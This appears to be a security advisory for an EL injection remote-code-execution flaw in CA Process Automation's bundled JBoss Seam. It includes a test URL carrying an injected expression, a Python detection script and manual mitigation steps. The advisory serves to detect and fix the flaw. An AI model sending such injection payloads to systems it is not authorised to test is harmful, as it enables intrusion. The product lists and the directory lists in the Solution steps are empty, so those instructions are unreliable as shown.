

CA Process Automation Security Vulnerability

Symptom:

CA Process Automation contains a high-risk vulnerability that allows a remote attacker to execute arbitrary code. The flaw is in the bundled JBoss Seam component: an attacker can supply arbitrary JBoss EL (JBoss's extension of the Unified Expression Language) in a request parameter, the server evaluates it, and the attacker can thereby fully compromise the server.

To test for this vulnerability, replace <HOST> with the hostname of the CA Process Automation installation in the following URL and request it:

http://<HOST>:8080/admin-console/login.seam?actionOutcome=/test.xhtml%3ftested%3d%23{expressions.getClass().forName('java.lang.Runtime')}

If the JBoss EL expression is evaluated, the server responds with a redirect to a URL of the following form, in which the tested parameter carries the result of the expression (class java.lang.Runtime) instead of the expression itself. This shows that the installation is vulnerable (the jsessionid and conversationId values will differ):

http://<HOST>:8080/admin-console/test.seam;jsessionid=0792523D29AE7A237D1CE5329C27A46F.?tested=class+java.lang.Runtime&conversationId=11

See the in-depth vulnerability details for further exploitation techniques.
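The following script automates the manual check above; it is an added example, not code from CA or from the advisory. It builds the advisory's test URL for a given host, sends it without following the redirect, and classifies the first response: a redirect whose target carries the evaluated value (class java.lang.Runtime) means the expression was executed; a redirect that still carries the literal expression means it was not; a 404 means nothing is deployed at /admin-console, which is the state the mitigation in the Solution section leaves the server in, so the same script can be re-run after the fix. The hostname pam.example.internal and the sample responses at the bottom are constructed for the example; only classify_response() is exercised offline.

```python
"""Automated form of the advisory's manual check (added example, not CA code).

build_probe_url() reproduces the advisory's test URL for a host; Seam is
vulnerable if, while building the redirect, it evaluates the EL expression
smuggled in through actionOutcome. classify_response() inspects only the
status code and headers of that first response, so it can be exercised offline
against the constructed samples at the bottom; probe() wires the two together
over the network without following the redirect.
"""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

# EL expression from the advisory's test URL. It is harmless on its own (a
# class lookup), but its evaluation proves arbitrary EL, and hence code, runs.
EL_PROBE = "#{expressions.getClass().forName('java.lang.Runtime')}"

# Redirect target of a vulnerable server: the expression has been replaced by
# its value, "class java.lang.Runtime", in the tested= parameter.
EVALUATED = re.compile(r"[?&;]tested=class(?:\+|%20)java\.lang\.Runtime(?:[&;]|$)")


def build_probe_url(host: str, port: int = 8080, scheme: str = "http") -> str:
    """Return the advisory's test URL for HOST (same encoding as the page: only ? = # escaped)."""
    outcome = "/test.xhtml?tested=" + EL_PROBE
    encoded = urllib.parse.quote(outcome, safe="/{}()'")
    return f"{scheme}://{host}:{port}/admin-console/login.seam?actionOutcome={encoded}"


def decode_action_outcome(url: str) -> str:
    """Return the decoded actionOutcome value of URL, i.e. what Seam will see."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    return query["actionOutcome"][0]


def classify_response(status: int, headers: dict) -> str:
    """Classify the first (unfollowed) response to the probe.

    'vulnerable'            redirect whose target carries the evaluated value
    'not-evaluated'         redirect that still carries the literal expression
    'admin-console-absent'  404: nothing is deployed at /admin-console (the
                            state the advisory's mitigation leaves the server in)
    'inconclusive'          anything else; inspect by hand
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    location = lowered.get("location", "")
    if status in (301, 302, 303, 307) and location:
        if EVALUATED.search(location):
            return "vulnerable"
        if EL_PROBE in urllib.parse.unquote_plus(location):
            return "not-evaluated"
    if status == 404:
        return "admin-console-absent"
    return "inconclusive"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface the redirect itself instead of following it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(host: str, port: int = 8080, timeout: float = 10.0) -> str:
    """Send the probe to HOST and classify the response (network access required)."""
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(build_probe_url(host, port), timeout=timeout) as resp:
            return classify_response(resp.status, dict(resp.headers.items()))
    except urllib.error.HTTPError as err:  # 3xx/4xx land here once redirects are not followed
        return classify_response(err.code, dict(err.headers.items()))


# Constructed sample responses (not captured from a real system), modelled on the
# advisory's expected output; the session and conversation ids are placeholders.
SAMPLE_VULNERABLE = (302, {"Location": "http://pam.example.internal:8080/admin-console/test.seam"
                                       ";jsessionid=0792523D29AE7A237D1CE5329C27A46F."
                                       "?tested=class+java.lang.Runtime&conversationId=11"})
SAMPLE_NOT_EVALUATED = (302, {"Location": "http://pam.example.internal:8080/admin-console/test.seam"
                                          "?tested=%23%7Bexpressions.getClass().forName('java.lang.Runtime')%7D"
                                          "&conversationId=3"})
SAMPLE_REMOVED = (404, {"Content-Type": "text/html"})

if __name__ == "__main__":
    print(probe(sys.argv[1]))
```

Run it as python probe_seam.py <HOST> against the installation before and after applying the Solution below; the redirect is deliberately not followed, because the evidence is the redirect target itself, and the probe expression only looks up a class rather than invoking anything on it.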

Affected Products:

Unaffected Products:

Solution:

A fix is planned for a future release of CA Process Automation. Until then, use the following instructions to manually remove the vulnerable JBoss Seam component from the CA PAM installation. These instructions also disable the JBoss Admin Console.

  1. Stop the PAM service.
  2. Delete the contents of the following directories:
  3. Move the following folders from <PAM_Home>\server\c2o\deployers to a location outside the PAM directory tree to keep as a backup:
  4. Move the following folder from <PAM_Home>\server\c2o\ to a location outside the PAM directory tree to keep as a backup:
  5. Start the PAM service.

Note: If the Admin Console is needed temporarily, stop the PAM service, revert the changes in Step 4 above, and restart the PAM service. Repeat Step 4 when the Admin Console is no longer needed.